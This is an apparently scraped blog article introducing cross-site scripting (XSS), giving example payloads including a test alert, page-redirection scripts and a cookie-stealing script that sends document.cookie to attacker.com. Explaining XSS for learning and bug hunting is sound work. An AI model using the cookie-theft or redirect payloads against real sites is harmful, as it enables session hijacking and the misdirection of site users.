.png)
1 day ago
11 BOOK THIS SPACE FOR AD
ARTICLE AD
Once again, I’m here with a brand-new article and a case study. In this article, I will share information about XSS vulnerabilities. However, unlike other posts, I will focus on how dangerous Cross-Site Scripting (XSS) vulnerabilities can be beyond what meets the eye.
Since JavaScript knowledge is fundamental to understanding XSS vulnerabilities, the more you improve yourself in this area, the more diverse payloads and methods you can develop.
You can find dozens of resources in the vast world of the internet to learn JavaScript. You can even benefit from specific platforms. When you see the vulnerabilities exposed by this seemingly simple language in XSS attacks, you won’t believe your eyes.
For example, the basic XSS test case <script>alert(1)</script> is well-known, but one of my personal favorites is the redirection payload : <script>window.location.href=”https://google.com"</script> or shorter version : <script>location.href=”https://google.com";</script>
With this XSS payload, you can change the location in a reflected XSS vulnerability and redirect the page.
Another favorite of mine is a payload that allows you to steal cookies:
<script>new Image().src="https://attacker.com/cookie.php?cookie="+document.cookie</script>
Bengali (Bangladesh) · 
English (United States) ·